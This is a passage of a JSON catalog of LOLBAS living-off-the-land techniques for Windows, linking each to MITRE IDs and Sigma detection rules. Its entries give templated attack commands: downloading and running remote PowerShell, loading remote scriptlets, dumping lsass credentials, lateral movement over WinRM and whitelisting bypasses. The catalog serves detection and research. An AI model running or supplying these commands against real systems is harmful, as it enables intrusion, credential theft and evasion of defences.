installation","aliases":[]},{"id":"lolbas:launch-vsdevshell-ps1:1","toolId":"lolbas:launch-vsdevshell-ps1","toolName":"Launch-VsDevShell.ps1","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"powershell -ep RemoteSigned -f .\\Launch-VsDevShell.ps1 -VsInstallationPath \"/../../../../../; {PATH:.exe} ;\"","description":"Execute binaries and commands from the context of the signed script using the \"VsInstallationPath\" flag.","usecase":"Proxy execution","mitre":["T1216"],"privilege":"user","fullPath":["C:\\Program Files (x86)\\Microsoft Visual Studio\\2019\\Community\\Common7\\Tools\\Launch-VsDevShell.ps1","C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\Common7\\Tools\\Launch-VsDevShell.ps1"],"toolType":"Script","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6199a703221a98ae6ad343c79c558da375203e4e/rules/windows/process_creation/proc_creation_win_lolbin_launch_vsdevshell.yml"}],"references":["https://twitter.com/nas_bench/status/1535981653239255040","https://lolbas-project.github.io/lolbas/Scripts/Launch-VsDevShell/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:manage-bde-wsf:0","toolId":"lolbas:manage-bde-wsf","toolName":"Manage-bde.wsf","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"set comspec={PATH_ABSOLUTE:.exe} & cscript c:\\windows\\system32\\manage-bde.wsf","description":"Set the comspec variable to another executable prior to calling manage-bde.wsf for execution.","usecase":"Proxy execution from script","mitre":["T1216"],"privilege":"user","fullPath":["C:\\Windows\\System32\\manage-bde.wsf"],"toolType":"Script","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_manage_bde.yml"},{"type":"IOC","value":"Manage-bde.wsf should not be invoked by a standard user under normal situations"}],"references":["https://gist.github.com/bohops/735edb7494fe1bd1010d67823842b712","https://twitter.com/bohops/status/980659399495741441","https://twitter.com/JohnLaTwC/status/1223292479270600706","https://lolbas-project.github.io/lolbas/Scripts/Manage-bde.wsf/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:manage-bde-wsf:1","toolId":"lolbas:manage-bde-wsf","toolName":"Manage-bde.wsf","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"copy c:\\users\\person\\evil.exe c:\\users\\public\\manage-bde.exe & cd c:\\users\\public\\ & cscript.exe c:\\windows\\system32\\manage-bde.wsf","description":"Run the manage-bde.wsf script with a payload named manage-bde.exe in the same directory to run the payload file.","usecase":"Proxy execution from script","mitre":["T1216"],"privilege":"user","fullPath":["C:\\Windows\\System32\\manage-bde.wsf"],"toolType":"Script","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_manage_bde.yml"},{"type":"IOC","value":"Manage-bde.wsf should not be invoked by a standard user under normal situations"}],"references":["https://gist.github.com/bohops/735edb7494fe1bd1010d67823842b712","https://twitter.com/bohops/status/980659399495741441","https://twitter.com/JohnLaTwC/status/1223292479270600706","https://lolbas-project.github.io/lolbas/Scripts/Manage-bde.wsf/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:pubprn-vbs:0","toolId":"lolbas:pubprn-vbs","toolName":"Pubprn.vbs","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"pubprn.vbs 127.0.0.1 script:{REMOTEURL:.sct}","description":"Set the 2nd variable with a Script COM moniker to perform Windows Script Host (WSH) Injection","usecase":"Proxy execution","mitre":["T1216.001"],"privilege":"user","fullPath":["C:\\Windows\\System32\\Printing_Admin_Scripts\\en-US\\pubprn.vbs","C:\\Windows\\SysWOW64\\Printing_Admin_Scripts\\en-US\\pubprn.vbs"],"toolType":"Script","detection":[{"type":"BlockRule","value":"https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/ff5102832031425f6eed011dd3a2e62653008c94/rules/windows/process_creation/proc_creation_win_lolbin_pubprn.yml"}],"references":["https://enigma0x3.net/2017/08/03/wsh-injection-a-case-study/","https://www.slideshare.net/enigma0x3/windows-operating-system-archaeology","https://github.com/enigma0x3/windows-operating-system-archaeology","https://lolbas-project.github.io/lolbas/Scripts/Pubprn/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:syncappvpublishingserver-vbs:0","toolId":"lolbas:syncappvpublishingserver-vbs","toolName":"Syncappvpublishingserver.vbs","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"SyncAppvPublishingServer.vbs \"n;((New-Object Net.WebClient).DownloadString('{REMOTEURL:.ps1}') | IEX\"","description":"Inject PowerShell script code with the provided arguments","usecase":"Use Powershell host invoked from vbs script","mitre":["T1216.002"],"privilege":"user","fullPath":["C:\\Windows\\System32\\SyncAppvPublishingServer.vbs"],"toolType":"Script","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_syncappvpublishingserver_vbs_execute_psh.yml"}],"references":["https://twitter.com/monoxgas/status/895045566090010624","https://twitter.com/subTee/status/855738126882316288","https://lolbas-project.github.io/lolbas/Scripts/Syncappvpublishingserver/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:utilityfunctions-ps1:0","toolId":"lolbas:utilityfunctions-ps1","toolName":"UtilityFunctions.ps1","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"powershell.exe -ep bypass -command \"set-location -path c:\\windows\\diagnostics\\system\\networking; import-module .\\UtilityFunctions.ps1; RegSnapin ..\\..\\..\\..\\temp\\unsigned.dll;[Program.Class]::Main()\"","description":"Proxy execute Managed DLL with PowerShell","usecase":"Execute proxied payload with Microsoft signed binary","mitre":["T1216"],"privilege":"user","fullPath":["C:\\Windows\\diagnostics\\system\\Networking\\UtilityFunctions.ps1"],"toolType":"Script","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/0.21-688-gd172b136b/rules/windows/process_creation/proc_creation_win_lolbas_utilityfunctions.yml"}],"references":["https://twitter.com/nickvangilder/status/1441003666274668546","https://lolbas-project.github.io/lolbas/Scripts/UtilityFunctions/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:winrm-vbs:0","toolId":"lolbas:winrm-vbs","toolName":"winrm.vbs","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"winrm invoke Create wmicimv2/Win32_Process @{CommandLine=\"{CMD}\"} -r:http://target:5985","description":"Lateral movement/Remote Command Execution via WMI Win32_Process class over the WinRM protocol","usecase":"Proxy execution","mitre":["T1216"],"privilege":"user","fullPath":["C:\\Windows\\System32\\winrm.vbs","C:\\Windows\\SysWOW64\\winrm.vbs"],"toolType":"Script","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_winrm_awl_bypass.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_winrm_execution_via_scripting_api_winrm_vbs.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/file/file_event/file_event_win_winrm_awl_bypass.yml"},{"type":"BlockRule","value":"https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules"}],"references":["https://www.slideshare.net/enigma0x3/windows-operating-system-archaeology","https://www.youtube.com/watch?v=3gz1QmiMhss","https://github.com/enigma0x3/windows-operating-system-archaeology","https://redcanary.com/blog/lateral-movement-winrm-wmi/","https://twitter.com/bohops/status/994405551751815170","https://posts.specterops.io/application-whitelisting-bypass-and-arbitrary-unsigned-code-execution-technique-in-winrm-vbs-c8c24fb40404","https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-windows-management-instrumentation.pdf","https://lolbas-project.github.io/lolbas/Scripts/winrm/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:winrm-vbs:1","toolId":"lolbas:winrm-vbs","toolName":"winrm.vbs","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"winrm invoke Create wmicimv2/Win32_Service @{Name=\"Evil\";DisplayName=\"Evil\";PathName=\"{CMD}\"} -r:http://acmedc:5985 && winrm invoke StartService wmicimv2/Win32_Service?Name=Evil -r:http://acmedc:5985","description":"Lateral movement/Remote Command Execution via WMI Win32_Service class over the WinRM protocol","usecase":"Proxy execution","mitre":["T1216"],"privilege":"admin","fullPath":["C:\\Windows\\System32\\winrm.vbs","C:\\Windows\\SysWOW64\\winrm.vbs"],"toolType":"Script","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_winrm_awl_bypass.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_winrm_execution_via_scripting_api_winrm_vbs.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/file/file_event/file_event_win_winrm_awl_bypass.yml"},{"type":"BlockRule","value":"https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules"}],"references":["https://www.slideshare.net/enigma0x3/windows-operating-system-archaeology","https://www.youtube.com/watch?v=3gz1QmiMhss","https://github.com/enigma0x3/windows-operating-system-archaeology","https://redcanary.com/blog/lateral-movement-winrm-wmi/","https://twitter.com/bohops/status/994405551751815170","https://posts.specterops.io/application-whitelisting-bypass-and-arbitrary-unsigned-code-execution-technique-in-winrm-vbs-c8c24fb40404","https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-windows-management-instrumentation.pdf","https://lolbas-project.github.io/lolbas/Scripts/winrm/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:winrm-vbs:2","toolId":"lolbas:winrm-vbs","toolName":"winrm.vbs","name":"AWL Bypass","source":"LOLBAS","platform":["Windows"],"capability":["AWL / Policy Bypass"],"nativeCategory":["AWL Bypass"],"command":"%SystemDrive%\\BypassDir\\cscript //nologo %windir%\\System32\\winrm.vbs get wmicimv2/Win32_Process?Handle=4 -format:pretty","description":"Bypass AWL solutions by copying cscript.exe to an attacker-controlled location; creating a malicious WsmPty.xsl in the same location, and executing winrm.vbs via the relocated cscript.exe.","usecase":"Execute arbitrary, unsigned code via XSL script","mitre":["T1220"],"privilege":"user","fullPath":["C:\\Windows\\System32\\winrm.vbs","C:\\Windows\\SysWOW64\\winrm.vbs"],"toolType":"Script","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_winrm_awl_bypass.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_winrm_execution_via_scripting_api_winrm_vbs.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/file/file_event/file_event_win_winrm_awl_bypass.yml"},{"type":"BlockRule","value":"https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules"}],"references":["https://www.slideshare.net/enigma0x3/windows-operating-system-archaeology","https://www.youtube.com/watch?v=3gz1QmiMhss","https://github.com/enigma0x3/windows-operating-system-archaeology","https://redcanary.com/blog/lateral-movement-winrm-wmi/","https://twitter.com/bohops/status/994405551751815170","https://posts.specterops.io/application-whitelisting-bypass-and-arbitrary-unsigned-code-execution-technique-in-winrm-vbs-c8c24fb40404","https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-windows-management-instrumentation.pdf","https://lolbas-project.github.io/lolbas/Scripts/winrm/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:pester-bat:0","toolId":"lolbas:pester-bat","toolName":"Pester.bat","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"Pester.bat [/help|?|-?|/?] \"$null; {CMD}\"","description":"Execute code using Pester. The third parameter can be anything. The fourth is the payload.","usecase":"Proxy execution","mitre":["T1216"],"privilege":"user","fullPath":["c:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\<VERSION>\\bin\\Pester.bat"],"toolType":"Script","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_pester_1.yml"}],"references":["https://twitter.com/Oddvarmoe/status/993383596244258816","https://twitter.com/_st0pp3r_/status/1560072680887525378","https://lolbas-project.github.io/lolbas/Scripts/Pester/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:pester-bat:1","toolId":"lolbas:pester-bat","toolName":"Pester.bat","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"Pester.bat ;{PATH:.exe}","description":"Execute code using Pester. Example here executes specified executable.","usecase":"Proxy execution","mitre":["T1216"],"privilege":"user","fullPath":["c:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\<VERSION>\\bin\\Pester.bat"],"toolType":"Script","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_pester_1.yml"}],"references":["https://twitter.com/Oddvarmoe/status/993383596244258816","https://twitter.com/_st0pp3r_/status/1560072680887525378","https://lolbas-project.github.io/lolbas/Scripts/Pester/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:acccheckconsole-exe:0","toolId":"lolbas:acccheckconsole-exe","toolName":"AccCheckConsole.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"AccCheckConsole.exe -window \"Untitled - Notepad\" {PATH_ABSOLUTE:.dll}","description":"Load a managed DLL in the context of AccCheckConsole.exe. The -window switch value can be set to an arbitrary active window name.","usecase":"Local execution of managed code from assembly DLL.","mitre":["T1218"],"privilege":"user","fullPath":["C:\\Program Files (x86)\\Windows Kits\\10\\bin\\10.0.22000.0\\x86\\AccChecker\\AccCheckConsole.exe","C:\\Program Files (x86)\\Windows Kits\\10\\bin\\10.0.22000.0\\x64\\AccChecker\\AccCheckConsole.exe","C:\\Program Files (x86)\\Windows Kits\\10\\bin\\10.0.22000.0\\arm\\AccChecker\\AccCheckConsole.exe","C:\\Program Files (x86)\\Windows Kits\\10\\bin\\10.0.22000.0\\arm64\\AccChecker\\AccCheckConsole.exe"],"toolType":"OtherMSBinary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/19396788dbedc57249a46efed2bb1927abc376d4/rules/windows/process_creation/proc_creation_win_lolbin_susp_acccheckconsole.yml"},{"type":"IOC","value":"Sysmon Event ID 1 - Process Creation"},{"type":"Analysis","value":"https://gist.github.com/bohops/2444129419c8acf837aedda5f0e7f340"}],"references":["https://gist.github.com/bohops/2444129419c8acf837aedda5f0e7f340","https://twitter.com/bohops/status/1477717351017680899","https://lolbas-project.github.io/lolbas/OtherMSBinaries/AccCheckConsole/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:acccheckconsole-exe:1","toolId":"lolbas:acccheckconsole-exe","toolName":"AccCheckConsole.exe","name":"AWL Bypass","source":"LOLBAS","platform":["Windows"],"capability":["AWL / Policy Bypass"],"nativeCategory":["AWL Bypass"],"command":"AccCheckConsole.exe -window \"Untitled - Notepad\" {PATH_ABSOLUTE:.dll}","description":"Load a managed DLL in the context of AccCheckConsole.exe. The -window switch value can be set to an arbitrary active window name.","usecase":"Local execution of managed code to bypass AppLocker.","mitre":["T1218"],"privilege":"user","fullPath":["C:\\Program Files (x86)\\Windows Kits\\10\\bin\\10.0.22000.0\\x86\\AccChecker\\AccCheckConsole.exe","C:\\Program Files (x86)\\Windows Kits\\10\\bin\\10.0.22000.0\\x64\\AccChecker\\AccCheckConsole.exe","C:\\Program Files (x86)\\Windows Kits\\10\\bin\\10.0.22000.0\\arm\\AccChecker\\AccCheckConsole.exe","C:\\Program Files (x86)\\Windows Kits\\10\\bin\\10.0.22000.0\\arm64\\AccChecker\\AccCheckConsole.exe"],"toolType":"OtherMSBinary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/19396788dbedc57249a46efed2bb1927abc376d4/rules/windows/process_creation/proc_creation_win_lolbin_susp_acccheckconsole.yml"},{"type":"IOC","value":"Sysmon Event ID 1 - Process Creation"},{"type":"Analysis","value":"https://gist.github.com/bohops/2444129419c8acf837aedda5f0e7f340"}],"references":["https://gist.github.com/bohops/2444129419c8acf837aedda5f0e7f340","https://twitter.com/bohops/status/1477717351017680899","https://lolbas-project.github.io/lolbas/OtherMSBinaries/AccCheckConsole/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:adplus-exe:0","toolId":"lolbas:adplus-exe","toolName":"adplus.exe","name":"Dump","source":"LOLBAS","platform":["Windows"],"capability":["Credential Access"],"nativeCategory":["Dump"],"command":"adplus.exe -hang -pn lsass.exe -o {PATH_ABSOLUTE:folder} -quiet","description":"Creates a memory dump of the lsass process","usecase":"Create memory dump and parse it offline","mitre":["T1003.001"],"privilege":"system","fullPath":["C:\\Program Files (x86)\\Windows Kits\\10\\Debuggers\\x64\\adplus.exe","C:\\Program Files (x86)\\Windows Kits\\10\\Debuggers\\x86\\adplus.exe"],"toolType":"OtherMSBinary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6199a703221a98ae6ad343c79c558da375203e4e/rules/windows/process_creation/proc_creation_win_lolbin_adplus.yml"},{"type":"IOC","value":"As a Windows SDK binary, execution on a system may be suspicious"}],"references":["https://mrd0x.com/adplus-debugging-tool-lsass-dump/","https://twitter.com/nas_bench/status/1534916659676422152","https://twitter.com/nas_bench/status/1534915321856917506","https://lolbas-project.github.io/lolbas/OtherMSBinaries/adplus/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:adplus-exe:1","toolId":"lolbas:adplus-exe","toolName":"adplus.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"adplus.exe -c {PATH:.xml}","description":"Execute arbitrary commands using adplus config file (see Resources section for a sample file).","usecase":"Run commands under a trusted Microsoft signed binary","mitre":["T1127"],"privilege":"user","fullPath":["C:\\Program Files (x86)\\Windows Kits\\10\\Debuggers\\x64\\adplus.exe","C:\\Program Files (x86)\\Windows Kits\\10\\Debuggers\\x86\\adplus.exe"],"toolType":"OtherMSBinary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6199a703221a98ae6ad343c79c558da375203e4e/rules/windows/process_creation/proc_creation_win_lolbin_adplus.yml"},{"type":"IOC","value":"As a Windows SDK binary, execution on a system may be suspicious"}],"references":["https://mrd0x.com/adplus-debugging-tool-lsass-dump/","https://twitter.com/nas_bench/status/1534916659676422152","https://twitter.com/nas_bench/status/1534915321856917506","https://lolbas-project.github.io/lolbas/OtherMSBinaries/adplus/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:adplus-exe:2","toolId":"lolbas:adplus-exe","toolName":"adplus.exe","name":"Dump","source":"LOLBAS","platform":["Windows"],"capability":["Credential Access"],"nativeCategory":["Dump"],"command":"adplus.exe -c {PATH:.xml}","description":"Dump process memory using adplus config file (see Resources section for a sample file).","usecase":"Run commands under a trusted Microsoft signed binary","mitre":["T1003.001"],"privilege":"system","fullPath":["C:\\Program Files (x86)\\Windows Kits\\10\\Debuggers\\x64\\adplus.exe","C:\\Program Files (x86)\\Windows Kits\\10\\Debuggers\\x86\\adplus.exe"],"toolType":"OtherMSBinary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6199a703221a98ae6ad343c79c558da375203e4e/rules/windows/process_creation/proc_creation_win_lolbin_adplus.yml"},{"type":"IOC","value":"As a Windows SDK binary, execution on a system may be suspicious"}],"references":["https://mrd0x.com/adplus-debugging-tool-lsass-dump/","https://twitter.com/nas_bench/status/1534916659676422152","https://twitter.com/nas_bench/status/1534915321856917506","https://lolbas-project.github.io/lolbas/OtherMSBinaries/adplus/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:adplus-exe:3","toolId":"lolbas:adplus-exe","toolName":"adplus.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"adplus.exe -crash -o \"{PATH_ABSOLUTE:folder}\" -sc {PATH:.exe}","description":"Execute arbitrary commands and binaries from the context of adplus. Note that providing an output directory via '-o' is required.","usecase":"Run commands under a trusted Microsoft signed binary","mitre":["T1127"],"privilege":"user","fullPath":["C:\\Program Files (x86)\\Windows Kits\\10\\Debuggers\\x64\\adplus.exe","C:\\Program Files (x86)\\Windows Kits\\10\\Debuggers\\x86\\adplus.exe"],"toolType":"OtherMSBinary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6199a703221a98ae6ad343c79c558da375203e4e/rules/windows/process_creation/proc_creation_win_lolbin_adplus.yml"},{"type":"IOC","value":"As a Windows SDK binary, execution on a system may be suspicious"}],"references":["https://mrd0x.com/adplus-debugging-tool-lsass-dump/","https://twitter.com/nas_bench/status/1534916659676422152","https://twitter.com/nas_bench/status/1534915321856917506","https://lolbas-project.github.io/lolbas/OtherMSBinaries/adplus/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:agentexecutor-exe:0","toolId":"lolbas:agentexecutor-exe","toolName":"AgentExecutor.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"AgentExecutor.exe -powershell \"{PATH_ABSOLUTE:.ps1}\" \"{PATH_ABSOLUTE:.1.log}\" \"{PATH_ABSOLUTE:.2.log}\" \"{PATH_ABSOLUTE:.3.log}\" 60000 \"C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\" 0 1","description":"Spawns powershell.exe and executes a provided powershell script with ExecutionPolicy Bypass argument","usecase":"Execute unsigned powershell scripts","mitre":["T1218"],"privilege":"user","fullPath":["C:\\Program Files (x86)\\Microsoft Intune Management Extension\\AgentExecutor.exe"],"toolType":"OtherMSBinary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/19396788dbedc57249a46efed2bb1927abc376d4/rules/windows/process_creation/proc_creation_win_lolbin_agentexecutor.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/19396788dbedc57249a46efed2bb1927abc376d4/rules/windows/process_creation/proc_creation_win_lolbin_agentexecutor_susp_usage.yml"}],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/AgentExecutor/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:agentexecutor-exe:1","toolId":"lolbas:agentexecutor-exe","toolName":"AgentExecutor.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"AgentExecutor.exe -powershell \"{PATH_ABSOLUTE:.ps1}\" \"{PATH_ABSOLUTE:.1.log}\" \"{PATH_ABSOLUTE:.2.log}\" \"{PATH_ABSOLUTE:.3.log}\" 60000 \"{PATH_ABSOLUTE:folder}\" 0 1","description":"If we place a binary named powershell.exe in the specified folder path, agentexecutor.exe will execute it successfully","usecase":"Execute a provided EXE","mitre":["T1218"],"privilege":"user","fullPath":["C:\\Program Files (x86)\\Microsoft Intune Management Extension\\AgentExecutor.exe"],"toolType":"OtherMSBinary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/19396788dbedc57249a46efed2bb1927abc376d4/rules/windows/process_creation/proc_creation_win_lolbin_agentexecutor.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/19396788dbedc57249a46efed2bb1927abc376d4/rules/windows/process_creation/proc_creation_win_lolbin_agentexecutor_susp_usage.yml"}],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/AgentExecutor/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:applauncher-exe:0","toolId":"lolbas:applauncher-exe","toolName":"AppLauncher.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"AppLauncher.exe {PATH_ABSOLUTE:.exe}","description":"Launches an executable via User Experience Virtualization tool.","usecase":"Executes an executable under a trusted, Microsoft signed binary.","mitre":["T1127"],"privilege":"user","fullPath":["C:\\Program Files\\Windows Kits\\10\\Microsoft User Experience Virtualization\\Management\\AppLauncher.exe","C:\\Program Files (x86)\\Windows Kits\\10\\Microsoft User Experience Virtualization\\Management\\AppLauncher.exe"],"toolType":"OtherMSBinary","references":["https://learn.microsoft.com/en-us/microsoft-desktop-optimization-pack/ue-v/uev-getting-started","https://lolbas-project.github.io/lolbas/OtherMSBinaries/AppLauncher/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:appcert-exe:0","toolId":"lolbas:appcert-exe","toolName":"AppCert.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"appcert.exe test -apptype desktop -setuppath {PATH_ABSOLUTE:.exe} -reportoutputpath {PATH_ABSOLUTE:.xml}","description":"Execute an executable file via the Windows App Certification Kit command-line tool.","usecase":"Performs execution of specified file, can be used as a defense evasion","mitre":["T1127"],"privilege":"admin","fullPath":["C:\\Program Files (x86)\\Windows Kits\\10\\App Certification Kit\\appcert.exe","C:\\Program Files\\Windows Kits\\10\\App Certification Kit\\appcert.exe"],"toolType":"OtherMSBinary","references":["https://learn.microsoft.com/windows/win32/win_cert/using-the-windows-app-certification-kit","https://lolbas-project.github.io/lolbas/OtherMSBinaries/AppCert/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:appcert-exe:1","toolId":"lolbas:appcert-exe","toolName":"AppCert.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"appcert.exe test -apptype desktop -setuppath {PATH_ABSOLUTE:.msi} -setupcommandline /q -reportoutputpath {PATH_ABSOLUTE:.xml}","description":"Install an MSI file via an msiexec instance spawned via appcert.exe as parent process.","usecase":"Execute custom made MSI file with malicious code","mitre":["T1218.007"],"privilege":"admin","fullPath":["C:\\Program Files (x86)\\Windows Kits\\10\\App Certification Kit\\appcert.exe","C:\\Program Files\\Windows Kits\\10\\App Certification Kit\\appcert.exe"],"toolType":"OtherMSBinary","references":["https://learn.microsoft.com/windows/win32/win_cert/using-the-windows-app-certification-kit","https://lolbas-project.github.io/lolbas/OtherMSBinaries/AppCert/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:appvlp-exe:0","toolId":"lolbas:appvlp-exe","toolName":"Appvlp.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"AppVLP.exe {PATH_SMB:.bat}","description":"Executes .bat file through AppVLP.exe","usecase":"Execution of BAT file hosted on Webdav server.","mitre":["T1218"],"privilege":"user","fullPath":["C:\\Program Files\\Microsoft Office\\root\\client\\appvlp.exe","C:\\Program Files (x86)\\Microsoft 